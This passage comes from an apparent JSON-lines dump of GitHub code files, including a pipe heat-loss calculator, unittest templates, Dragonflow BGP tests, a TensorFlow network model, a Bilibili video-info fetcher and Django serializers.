[kg/s]\n\n di : numeric\n :math:`d_i`: inner diameter [m]\n\n T_av : numeric\n :math:`T_{av}`: average temperature [°C]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n flow velocity [m/s]: numeric\n\n \"\"\"\n rho = PropsSI(\n 'D', 'T', T_av + 273.15, 'P', p, 'IF97::Water') # [kg/m^3]\n\n return mf / (rho * (0.5 * di) ** 2 * math.pi)\n\n\ndef calc_pipe_loss(temp_average, u_value, temp_ground=10):\n r\"\"\"\n Calculates the heat loss of a DHS pipe trench.\n\n Temperatures must be given in the same unit, K or °C.\n\n .. calc_pipe_loss_equation:\n\n :math:`P_{loss} = (T_{average} - T_{ground}) \\cdot U`\n\n Parameters\n ----------\n temp_average : float\n :math:`T_{average}`: Average temperature of medium in\n (if u_value relates to forward and return pipe,\n the average temperature of forward and return must be given.)\n u_value : float\n :math:`U`: Heat transmission coefficient of whole trench in W/(m*K)\n (u_value of forward and return pipe must be summed up, if total\n heat loss should be calculated.)\n temp_ground : float\n :math:`T_{ground}`: Temperature of surrounding, e.g. ground.\n\n Returns\n -------\n Heat loss of pipe trench [W/m]: float\n \"\"\"\n return (temp_average - temp_ground) * u_value\n","repo_name":"oemof/DHNx","sub_path":"dhnx/optimization/precalc_hydraulic.py","file_name":"precalc_hydraulic.py","file_ext":"py","file_size_in_byte":17700,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"40284150044","text":"import csv\n\n# Interface to the data contained in atmosphere.csv\nclass Atmosphere(object):\n # Dependant on data source\n HEIGHT_MIN = -304.8\n HEIGHT_MAX = 85344\n # Public\n def __init__(self,file='atmosphere.csv'):\n self._data = []\n self.load_data(file)\n\n def load_data(self, file):\n with open(file, 'r') as data_file:\n csv_reader = csv.DictReader(data_file, delimiter = ',')\n for line in csv_reader:\n self._data.append(line)\n\n def get_attribute_by_height(self, height, attribute):\n index = self._get_index_by_height(height)\n\n if index < 0 or index > len(self._data):\n print('Index out of bounds: ', index)\n return -1\n\n # Perform a linear approximation if between terms\n base_height = float(self._data[index]['alt (m)'])\n height_diff = height - base_height\n if height_diff < 0.1: # allow for floating point inexactness\n return float(self._data[index][attribute])\n else:\n next_index = index + 1\n next_height = float(self._data[next_index]['alt (m)'])\n delta_height = float(next_height - base_height)\n\n base_attribute = float(self._data[index][attribute])\n next_attribute = float(self._data[next_index][attribute])\n delta_attribute = next_attribute - base_attribute\n\n return base_attribute + (delta_attribute * height_diff) / delta_height\n\n def get_pressure_by_height(self, height):\n return self.get_attribute_by_height(height, 'press (kpa)')\n\n def get_density_by_height(self, height):\n return self.get_attribute_by_height(height, 'dens (kg/cu.m)')\n\n\n # Private\n @staticmethod\n def _get_index_by_height(height):\n if height < Atmosphere.HEIGHT_MIN or height > Atmosphere.HEIGHT_MAX:\n return -1\n\n if height < 19812:\n return int((height / 304.8) + 1)\n elif height >= 19812:\n return int(66 + ((height / 1524) - 13))\n","repo_name":"ZenithSuborbitals/Rocket-Flight-Simulator","sub_path":"rocket_flight_simulator/atmosphere.py","file_name":"atmosphere.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"73293001744","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Generic test cases.\"\"\"\n\nimport unittest\nimport warnings\nfrom textwrap import dedent\nfrom typing import (\n Any,\n ClassVar,\n Collection,\n Generic,\n Iterable,\n Mapping,\n MutableMapping,\n Optional,\n Type,\n TypeVar,\n)\n\n__all__ = [\n \"GenericTestCase\",\n \"MetaTestCase\",\n \"TestsTestCase\",\n]\n\nT = TypeVar(\"T\")\nX = TypeVar(\"X\")\n\n\nclass GenericTestCase(Generic[T], unittest.TestCase):\n \"\"\"Generic tests.\"\"\"\n\n cls: ClassVar[Type[T]] # type:ignore\n kwargs: ClassVar[Optional[Mapping[str, Any]]] = None\n instance: T\n\n def setUp(self) -> None:\n \"\"\"Set up the generic testing method.\"\"\"\n if not hasattr(self, \"cls\"):\n self.skipTest(\n dedent(\n f\"\"\"\\\n The class variable `cls` was not set on {self.__class__}.\n If you have implemented a subclass of :class:`unittest_template.GenericTestCase`,\n make sure you do it by only importing :mod:`unittest_template`, then accessing it\n with the dot operator. Do NOT do ``from unittest_template import GenericTestCase``,\n otherwise your testing harness might collect it as a stand-alone test and try to\n run it, which will always result in this failure.\n \"\"\"\n )\n )\n\n self.pre_setup_hook()\n kwargs = self.kwargs or {}\n self.instance_kwargs = self._pre_instantiation_hook(kwargs=dict(kwargs))\n self.instance = self.cls(**self.instance_kwargs) # type: ignore\n self.post_instantiation_hook()\n\n def pre_setup_hook(self) -> None:\n \"\"\"Run before setUp.\"\"\"\n\n def _pre_instantiation_hook(self, kwargs: MutableMapping[str, Any]) -> MutableMapping[str, Any]:\n \"\"\"Perform actions before instantiation, potentially modyfing kwargs.\"\"\"\n return kwargs\n\n def post_instantiation_hook(self) -> None:\n \"\"\"Perform actions after instantiation.\"\"\"\n\n def test_instance(self):\n \"\"\"Trivially check the instance matches the class.\"\"\"\n self.assertIsInstance(self.instance, self.cls)\n\n\ndef get_subclasses(cls: Type[X]) -> Iterable[Type[X]]:\n \"\"\"Get all subclasses.\n\n :param cls: The ancestor class\n :yields: Descendant classes of the ancestor class\n \"\"\"\n for subclass in cls.__subclasses__():\n yield from get_subclasses(subclass)\n yield subclass\n\n\nclass MetaTestCase(Generic[T], unittest.TestCase):\n \"\"\"A generic test for tests.\"\"\"\n\n base_cls: ClassVar[Type[T]] # type:ignore\n base_test: ClassVar[Type[GenericTestCase[T]]] # type:ignore\n skip_cls: ClassVar[Optional[Collection[T]]] = None # type:ignore\n\n def test_testing(self):\n \"\"\"Check that there is a test for all subclasses.\"\"\"\n try:\n to_test = set(get_subclasses(self.base_cls))\n except AttributeError:\n self.fail(\n msg=dedent(\n f\"\"\"\\\n The class variable `base_cls` was not set on {self.__class__}. If you have implemented\n a subclass of unittest_template.MetaTestCase, make sure you do it by only importing\n unittest_template, then accessing it with the dot operator. Do NOT do\n `from unittest_template import MetaTestCase`, otherwise your testing harness might\n collect it as a stand-alone test and try to run it, which will always result in this\n failure.\n \"\"\"\n )\n )\n\n if self.skip_cls is not None:\n to_test.difference_update(self.skip_cls)\n tested = {\n test_cls.cls\n for test_cls in get_subclasses(self.base_test)\n if hasattr(test_cls, \"cls\") # avoid mid-level classes\n }\n not_tested = to_test.difference(tested)\n self.assertEqual(\n set(), not_tested, msg=f\"Some subclasses of {self.base_cls} were not tested.\"\n )\n\n\nclass TestsTestCase(MetaTestCase):\n \"\"\"A backwards compatible wrapper of MetaTestCase.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the test case.\"\"\"\n warnings.warn(\n \"unittest_templates.TestsTestCase has been renamed to unittest_tempaltes.MetaTestCase\",\n DeprecationWarning,\n )\n super().setUp()\n","repo_name":"cthoyt/unittest-templates","sub_path":"src/unittest_templates/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33376942814","text":"'''\n\nsplit() 切割字串成为清单, 可将英文句子的每一个单字切割成参数的清单\n语法为: \n\n字串名称.split()\n字串名称.split(,) #指定用逗号 , 分割字元来切割字串成为清单\n\n'''\n\nstr1 = \" this is a pen \"\nlist1 = str1.split()\nprint(list1)\n\nlist2 = str1.split(\",\")\nprint(list2)","repo_name":"alankowabunga/Python","sub_path":"python-textbook/Ch05串列與元組/12split.py","file_name":"12split.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789626954","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport threading\n\nimport eventlet\nfrom eventlet import greenthread\nimport mock\n\nfrom dragonflow.controller import df_bgp_service\nfrom dragonflow.db import api_nb\nfrom dragonflow.db.models import bgp\nfrom dragonflow.tests import base as tests_base\n\n\ndef get_all_side_effect(model, topic=None):\n if model == bgp.BGPPeer:\n return [bgp.BGPPeer(id=\"peer1\",\n topic=\"topic1\",\n name=\"peer1\",\n peer_ip=\"172.24.4.88\",\n remote_as=4321)]\n\n if model == bgp.BGPSpeaker:\n return [bgp.BGPSpeaker(id=\"speaker1\",\n topic=\"topic1\",\n name=\"speaker1\",\n local_as=1234,\n peers=[\"peer1\"],\n host_routes=[],\n prefix_routes=[],\n ip_version=4)]\n\n\nclass LoopingCallByEvent(object):\n def __init__(self, func):\n self.func = func\n self.thread = None\n self.event = None\n self.is_running = False\n\n def start(self, *args):\n self.event = threading.Event()\n self.is_running = True\n self.thread = greenthread.spawn(self.run)\n\n def stop(self):\n self.is_running = False\n\n def fire(self):\n self.event.set()\n eventlet.sleep(1)\n\n def run(self):\n self.event.wait()\n while self.is_running:\n self.func()\n self.event.clear()\n self.event.wait()\n\n\nclass TestDFBGPService(tests_base.BaseTestCase):\n\n def setUp(self):\n super(TestDFBGPService, self).setUp()\n mock.patch('dragonflow.controller.df_bgp_service.'\n 'BGPService.initialize_driver').start()\n mock_nb_api = mock.patch('dragonflow.db.api_nb.NbApi.get_instance')\n mock_nb_api.start()\n self.addCleanup(mock_nb_api.stop)\n nb_api = api_nb.NbApi.get_instance()\n self.bgp_service = df_bgp_service.BGPService(nb_api)\n self.bgp_service.bgp_driver = mock.Mock()\n self.bgp_service.bgp_pulse = LoopingCallByEvent(\n self.bgp_service.sync_data_from_nb_db)\n\n iter_models = mock.patch('dragonflow.db.model_framework.iter_models',\n return_value={bgp.BGPSpeaker, bgp.BGPPeer})\n iter_models.start()\n self.addCleanup(iter_models.stop)\n self.bgp_service.start()\n self.addCleanup(self.bgp_service.stop)\n\n def test_sync_bgp_data_to_db_store(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n self.bgp_service.bgp_pulse.fire()\n\n self.assertTrue(\n self.bgp_service.db_store.get_one(bgp.BGPPeer(id=\"peer1\")))\n self.assertTrue(\n self.bgp_service.db_store.get_one(bgp.BGPSpeaker(id=\"speaker1\")))\n\n def test_add_remove_bgp_peer_speaker(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n self.bgp_service.bgp_pulse.fire()\n\n self.bgp_service.bgp_driver.add_bgp_speaker.assert_called_once_with(\n 1234)\n self.bgp_service.bgp_driver.add_bgp_peer.assert_called_once_with(\n 1234, \"172.24.4.88\", 4321)\n\n def empty_get_all(model, topic=None):\n return []\n\n self.bgp_service.nb_api.get_all.side_effect = empty_get_all\n # Give fixed interval another round.\n self.bgp_service.bgp_pulse.fire()\n self.bgp_service.bgp_driver.delete_bgp_peer.assert_called_once_with(\n 1234, \"172.24.4.88\")\n self.bgp_service.bgp_driver.delete_bgp_speaker.assert_called_once_with(\n 1234)\n\n def test_advertise_withdraw_routes(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n\n def get_all_with_routes_side_effect(model, topic=None):\n if model == bgp.BGPPeer:\n return [bgp.BGPPeer(id=\"peer1\",\n topic=\"topic1\",\n name=\"peer1\",\n peer_ip=\"172.24.4.88\",\n remote_as=4321)]\n\n if model == bgp.BGPSpeaker:\n routes = [{'destination': \"10.0.0.0/24\",\n 'nexthop': \"172.24.4.66\"}]\n return [bgp.BGPSpeaker(id=\"speaker1\",\n topic=\"topic1\",\n name=\"speaker1\",\n local_as=1234,\n peers=[\"peer1\"],\n prefix_routes=routes,\n host_routes=[],\n ip_version=4)]\n\n self.bgp_service.nb_api.get_all.side_effect = (\n get_all_with_routes_side_effect)\n\n self.bgp_service.bgp_pulse.fire()\n\n self.bgp_service.bgp_driver.advertise_route.assert_called_once_with(\n 1234, \"10.0.0.0/24\", \"172.24.4.66\")\n\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n self.bgp_service.bgp_pulse.fire()\n self.bgp_service.bgp_driver.withdraw_route.assert_called_once_with(\n 1234, \"10.0.0.0/24\")\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/tests/unit/test_df_bgp_service.py","file_name":"test_df_bgp_service.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"8847416482","text":"\"\"\"\nBasic I : How to read images ?\n\nTo hold or read a image we will use a image variable and \nwe will need the 'imread'(which will take the img loc path) \nfunction to do so after that in order to show the image we \nwill use 'imshow'(which will take output window name as a string \nand the image object from imread func) function. To make the window\nstay we will use waitKey function with 0 which means infinity any \nother value will be in ms. \n\"\"\"\n\n\nimport cv2\n\ndef read_image(img_path):\n img = cv2.imread(img_path)\n cv2.imshow(\"Output\", img)\n cv2.waitKey(0)\n return 0\n\nif __name__ == \"__main__\":\n img_path = \"F:/git/opencv-projects-python/resources/nature.jpg\"\n read_image(img_path)","repo_name":"FatinShadab/opencv-projects-python","sub_path":"Basic_Task/read_img.py","file_name":"read_img.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1368027500","text":"#\n# @lc app=leetcode id=2 lang=python3\n#\n# [2] Add Two Numbers\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n ans = dummy = ListNode(0)\n carry = 0\n while l1 or l2 or carry:\n val1 = l1.val if l1 else 0\n val2 = l2.val if l2 else 0\n dummy.next = ListNode((val1 + val2 + carry) % 10)\n carry = (val1 + val2 + carry) // 10\n l1 = l1.next if l1 else l1\n l2 = l2.next if l2 else l2\n dummy = dummy.next \n return ans.next\n \n# @lc code=end\n\n","repo_name":"quixoteji/Leetcode","sub_path":"solutions/2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1752035827","text":"import tensorflow as tf\r\nfrom utils.Utils import *\r\n\r\n\r\nclass CriticalMirrorNetLearnable(object):\r\n \"\"\"\r\n Class representing a critical echo net\r\n \"\"\"\r\n\r\n def __init__(self, params, hidden_weights=None):\r\n self.params = params\r\n self.network_shape = self.params['network_shape']\r\n self.input_dim = self.network_shape[0]\r\n self.output_dim = self.network_shape[-1]\r\n self.batch_size = self.params['batch_size']\r\n self.hidden_weights = hidden_weights\r\n self.tensorboard_dir = self.params['tensorboard_dir']\r\n\r\n self.activation_function = self.params['activation_function']\r\n self.optimizer_ = self.params['optimizer']\r\n self.hs_optimizer_ = self.params['optimizer']\r\n # model\r\n self.input = tf.placeholder(tf.float32, [None, self.input_dim], name=\"input\")\r\n self.output = tf.placeholder(tf.float32, [None, self.output_dim], name=\"output\")\r\n self.activation_patterns = {}\r\n self.hidden_state_activation_patterns = {}\r\n self.activation = self.input\r\n self.hidden_states = {}\r\n self.hidden_states_update_ops = {}\r\n for i in range(1, len(self.network_shape) - 1):\r\n with tf.name_scope(\"layer{0}\".format(i)):\r\n h = tf.Variable(tf.truncated_normal([self.network_shape[i]]), name=\"hidden_state\", trainable=False)\r\n # h = tf.truncated_normal([self.batch_size, self.network_shape[i]])\r\n self.hidden_states[\"hs_{0}\".format(i)] = h\r\n Utils.variable_summaries(self.hidden_states[\"hs_{0}\".format(i)], \"hs_{0}\".format(i))\r\n if self.hidden_weights is not None:\r\n H_tune = tf.Variable(1.0, trainable=False, name=\"H_tune\")\r\n # Utils.variable_summaries(H_tune, \"H_tune\")\r\n else:\r\n H_tune = tf.Variable(1, trainable=False, name=\"H_tune\")\r\n\r\n self.H_grad_modifier_list = []\r\n for i in range(len(self.network_shape) - 1):\r\n with tf.name_scope(\"layer{0}\".format(i + 1)):\r\n if i < len(self.network_shape) - 2:\r\n with tf.name_scope(\"hidden\"):\r\n\r\n # input weight and bias\r\n W = tf.Variable(\r\n tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05),\r\n name=\"W\")\r\n bW = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bW\")\r\n Utils.variable_summaries(W, \"W\")\r\n Utils.variable_summaries(bW, \"bW\")\r\n H_name = \"H_{0}\".format(i + 1)\r\n if self.hidden_weights is not None and H_name in self.hidden_weights.keys():\r\n H = tf.Variable(self.hidden_weights[H_name].astype('float32'), dtype=tf.float32,\r\n trainable=True, name=\"H\")\r\n Utils.variable_summaries(H, \"H\")\r\n H_grad_modifier = tf.Variable(tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05),\r\n trainable=True, name=\"h_grad_modifier\")\r\n Utils.variable_summaries(H_grad_modifier, \"h_grad_modifier\")\r\n self.H_grad_modifier_list.append(H_grad_modifier)\r\n else:\r\n H = tf.Variable(\r\n tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05),\r\n trainable=False, name=\"H\")\r\n\r\n input_for_hidden = tf.matmul(self.activation, W) + bW\r\n tiled_h = tf.reshape(tf.tile(self.hidden_states[\"hs_{0}\".format(i + 1)], [self.batch_size]), [self.batch_size, -1])\r\n hidden_update = tf.nn.tanh(tf.add(input_for_hidden,\r\n tf.matmul(tiled_h, tf.scalar_mul(H_tune, H))))\r\n\r\n with tf.name_scope(\"mirror\"):\r\n # mirror input and bias\r\n M = tf.Variable(tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05), name=\"M\")\r\n bM = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bM\")\r\n Utils.variable_summaries(M, \"M\")\r\n Utils.variable_summaries(bM, \"bM\")\r\n input_for_mirror = tf.nn.tanh(tf.matmul(self.activation, M) + bM)\r\n\r\n with tf.name_scope(\"readout\"):\r\n # readout weights and biases\r\n R = tf.Variable(tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05), name=\"R\")\r\n bR = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bR\")\r\n Utils.variable_summaries(R, \"R\")\r\n Utils.variable_summaries(bR, \"bR\")\r\n readout = tf.nn.tanh(tf.matmul(hidden_update, R) + bR)\r\n\r\n with tf.name_scope(\"activation\"):\r\n self.activation = self.activation_function(tf.multiply(readout, input_for_mirror))\r\n # self.hidden_state_activation_patterns['hidden_state_layer_{0}'.format(i + 1)] = self.hidden_states[self.hidden_states[\"hs_{0}\".format(i+1)]]\r\n self.hidden_states_update_ops[\"hs_{0}\".format(i+1)] = self.hidden_states[\"hs_{0}\".format(i+1)].assign(hidden_update[0])\r\n # self.hidden_states[\"hs_{0}\".format(i+1)] = hidden_update\r\n else:\r\n W = tf.Variable(\r\n tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05),\r\n name=\"W\")\r\n bW = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bW\")\r\n Utils.variable_summaries(W, \"W\")\r\n Utils.variable_summaries(bW, \"bW\")\r\n with tf.name_scope(\"activation\"):\r\n self.activation = self.activation_function(tf.matmul(self.activation, W) + bW)\r\n act = self.activation\r\n if i > 0:\r\n self.activation_patterns['layer_{0}'.format(i)] = act\r\n\r\n # cost\r\n with tf.name_scope(\"cost\"):\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.activation, self.output))\r\n tf.summary.scalar('cost', self.cost)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(self.activation, 1), tf.argmax(self.output, 1))\r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n gv = self.optimizer_.compute_gradients(self.cost)\r\n self.hidden_modifier_cost = self.optimize_hidden_modifier(gv)\r\n tf.summary.scalar('hidden_modifier_cost', self.hidden_modifier_cost)\r\n\r\n fm_gv = self.filter_modify_gradients(gv)\r\n\r\n gv_mod = self.hs_optimizer_.compute_gradients(self.hidden_modifier_cost)\r\n\r\n self.hs_optimizer = self.hs_optimizer_.apply_gradients([t for t in gv_mod if \"hidden/h_grad_modifier\" in t[1].name])\r\n\r\n self.optimizer = self.optimizer_.apply_gradients(fm_gv)\r\n\r\n self.sess = tf.Session()\r\n\r\n self.merged = tf.summary.merge_all()\r\n self.summ_writer = tf.summary.FileWriter(self.tensorboard_dir, self.sess.graph)\r\n\r\n init = tf.global_variables_initializer()\r\n\r\n self.sess.run(init)\r\n\r\n def partial_fit(self, X, Y):\r\n fetches = [self.cost, self.optimizer, self.merged, self.hidden_modifier_cost, self.hs_optimizer]\r\n for _, v in self.hidden_states_update_ops.items():\r\n fetches.append(v)\r\n cost, opt, merged, hs_cost, hs_opt, *_ = self.sess.run(fetches, feed_dict={self.input: X, self.output: Y})\r\n\r\n return cost, merged\r\n\r\n def set_batch_size(self, bs):\r\n self.batch_size = bs\r\n\r\n def inference(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.cost, feed_dict={self.input: X, self.output: Y})\r\n\r\n def optimize_hidden_modifier(self, gv):\r\n grad = []\r\n for tup in gv:\r\n if(\"hidden/H\" in tup[1].name):\r\n grad.append(tup[0])\r\n else:\r\n continue\r\n\r\n costs = []\r\n for (tupM, tup) in zip(self.H_grad_modifier_list, grad):\r\n costs.append(tf.reduce_sum(tf.abs(tf.reduce_sum(tf.multiply(tupM, tup), axis=1))))\r\n\r\n return tf.add_n(costs)\r\n\r\n def filter_modify_gradients(self, gv):\r\n modifiers = []\r\n to_modify = []\r\n rest = []\r\n for tup in gv:\r\n if(\"h_grad_modifier\" in tup[1].name):\r\n modifiers.append(tup)\r\n elif(\"hidden/H\" in tup[1].name):\r\n to_modify.append(tup)\r\n else:\r\n rest.append(tup)\r\n\r\n for (tupM, tup) in zip(modifiers, to_modify):\r\n rest.append((tf.multiply(tupM[1], tup[0]), tup[1]))\r\n\r\n return rest\r\n\r\n def get_accuracy(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.accuracy, feed_dict={self.input: X, self.output: Y})\r\n\r\n def calc_total_cost(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.cost, feed_dict={self.input: X, self.output: Y})\r\n\r\n def get_activations(self, X):\r\n return {k: self.sess.run(v, feed_dict={self.input: X}) for k, v in self.activation_patterns.items()}\r\n\r\n def get_activation_pattern(self, input_, activation_name=None):\r\n if activation_name is not None:\r\n return [self.sess.run(self.activation_patterns[activation_name], feed_dict={self.input: input_})]\r\n else:\r\n return [self.sess.run(self.activation_patterns['activation_layer_{0}'.format(i + 1)], feed_dict={self.input: input_})\r\n for i in range(len(self.network_shape) - 1)]\r\n\r\n def get_hidden_state_pattern(self, input_, activation_name=None):\r\n if activation_name is not None:\r\n return [self.sess.run(self.activation_patterns[activation_name], feed_dict={self.input: input_})]\r\n else:\r\n return [self.sess.run(self.hidden_state_activation_patterns['hidden_state_layer_{0}'.format(i + 1)], feed_dict={self.input: input_})\r\n for i in range(len(self.network_shape) - 1)]\r\n\r\n def get_weight(self, weight_name=None):\r\n if weight_name is not None:\r\n return [self.sess.run(self.weights[weight_name])]\r\n else:\r\n return [self.sess.run(self.weights['W_{0}'.format(i)]) for i in range(len(self.weights))]\r\n\r\n","repo_name":"eidonfiloi/criticalAI","sub_path":"models/CriticalMirrorNetLearnable.py","file_name":"CriticalMirrorNetLearnable.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8402275341","text":"#!/usr/bin/python3\n'''\nsili - 解析B站视频\n'''\nfrom collections import namedtuple\nfrom html.parser import HTMLParser\nimport html\nimport json\nimport requests\n\n__all__ = [\"INFO_API_URL\", \"VIDEO_API_URL\", \"BANGUMI_PLAY_URL\", \"HTML_PARSER\",\n \"get_avid_from_epid\", \"get_video_info\", \"get_video_links\", \"UserInfo\",\n \"VideoInfo\", \"VideoStat\", \"PartInfo\", \"DownloadInfo\", \"FileInfo\", \"Vec2\"]\n\n# 获取视频信息 (包括分P信息) 的接口, 返回JSON\nINFO_API_URL:str = \"https://api.bilibili.com/x/web-interface/view?aid={avid}\"\n# 获取视频地址的API, 返回JSON, 由Cookies中的SESSDATA决定用户\nVIDEO_API_URL:str = \"https://api.bilibili.com/x/player/playurl?avid={avid}&cid={cid}&qn={quality}\"\n# 播放番剧/电影/电视剧的页面,用于获取AVID\nBANGUMI_PLAY_URL:str = \"https://www.bilibili.com/bangumi/play/ep{epid}\"\n\nUserInfo = namedtuple(\"UserInfo\", [\"uid\", \"name\", \"avatar\"])\nVideoInfo = namedtuple(\"VideoInfo\", [\n \"avid\", \"title\", \"time\", \"description\", \"cover\", \"owner\", \"stat\", \"parts\"])\nVideoStat = namedtuple(\"VideoStat\", [\n \"view\", \"like\", \"coin\", \"favorite\", \"share\", \"danmaku\", \"comment\"])\nPartInfo = namedtuple(\"PartInfo\", [\n \"cid\", \"title\", \"duration\", \"size\"])\nDownloadInfo = namedtuple(\"DownloadInfo\", [\"quality\", \"duration\", \"files\"])\nFileInfo = namedtuple(\"FileInfo\", [\"duration\", \"size\", \"links\"])\nVec2 = namedtuple(\"Vec2\", [\"x\", \"y\"])\nclass Error(Exception): pass\nclass ApiError(Error):\n def __init__(self, code):\n super().__init__(code)\n self.code = code\nclass VideoNonExist(Error): pass\n\nclass AvidParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.avid = None\n self.started = False\n\n def handle_starttag(self, tag, attrs):\n if (\"class\", \"av-link\") in attrs:\n self.started = True\n\n def handle_data(self, data):\n if self.started:\n self.avid = int(data[2:])\n self.started = False\n\n\ndef get_avid_from_epid(epid:int) -> int:\n '''从EPID获取AVID'''\n assert 0 < epid < 0x80000000\n response = requests.get(BANGUMI_PLAY_URL.format(epid=epid))\n if response.status_code == 404:\n raise VideoNonExist(f\"ep{epid}\")\n response.raise_for_status()\n # TODO: 我希望���有一天摆脱对解析HTML的依赖\n parser = AvidParser()\n parser.feed(response.text)\n return parser.avid\n\ndef get_video_info(avid:int) -> VideoInfo:\n '''获取视频信息'''\n assert 0 < avid < 0x80000000\n response = requests.get(INFO_API_URL.format(avid=avid))\n response.raise_for_status()\n data = response.json()\n if data[\"code\"] == -404:\n raise VideoNonExist(f\"av{avid}\")\n elif data[\"code\"] != 0:\n raise ApiError(data[\"code\"])\n parts = []\n for part in data[\"data\"][\"pages\"]:\n parts.append(PartInfo(\n title=part[\"part\"],\n cid=part[\"cid\"],\n duration=part[\"duration\"],\n size=Vec2(\n part[\"dimension\"][\"width\"],\n part[\"dimension\"][\"height\"])))\n return VideoInfo(\n avid=avid,\n title=data[\"data\"][\"title\"],\n time=data[\"data\"][\"pubdate\"],\n description=data[\"data\"][\"desc\"],\n cover=data[\"data\"][\"pic\"],\n owner=UserInfo(\n uid=data[\"data\"][\"owner\"][\"mid\"],\n name=data[\"data\"][\"owner\"][\"name\"],\n avatar=data[\"data\"][\"owner\"][\"face\"]),\n stat=VideoStat(\n view=data[\"data\"][\"stat\"][\"view\"],\n like=data[\"data\"][\"stat\"][\"like\"],\n coin=data[\"data\"][\"stat\"][\"coin\"],\n favorite=data[\"data\"][\"stat\"][\"favorite\"],\n share=data[\"data\"][\"stat\"][\"share\"],\n danmaku=data[\"data\"][\"stat\"][\"danmaku\"],\n comment=data[\"data\"][\"stat\"][\"reply\"]),\n parts=tuple(parts))\n\ndef get_video_files(avid:int, cid:int, quality:int=120, session:str=\"\"):\n response = requests.get(\n VIDEO_API_URL.format(avid=avid, cid=cid, quality=quality),\n cookies={\"SESSDATA\": session})\n response.raise_for_status()\n data = response.json()\n if data[\"code\"] == -404:\n raise VideoNonExist(f\"av{avid}\")\n elif data[\"code\"] != 0:\n raise ApiError(data[\"code\"])\n files = []\n for i in data[\"data\"][\"durl\"]:\n files.append(FileInfo(\n duration=i[\"length\"],\n size=i[\"size\"],\n links=tuple([i[\"url\"]] + i[\"backup_url\"])))\n return DownloadInfo(\n quality=data[\"data\"][\"quality\"],\n duration=data[\"data\"][\"timelength\"],\n files=tuple(files))\n","repo_name":"su226/small-projects","sub_path":"专栏下载器/sili/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1108480226","text":"from rest_framework import serializers\nfrom models import Anime, Subscription, User, Season, Track\n\n\n# Season serializers\nclass SeasonSerializer(serializers.ModelSerializer):\n class Meta:\n model = Season\n fields = ('id', 'name', 'cover', 'default', 'season_id', 'anime', 'count')\n\n\nclass SeasonOfSubscriptionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Season\n fields = ('id', 'name', 'cover', 'default', 'season_id', 'count')\n\n\n# Anime serializers\nclass AnimeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Anime\n fields = ('id', 'aid', 'name', 'description', 'is_end', 'episode', 'poster_link', 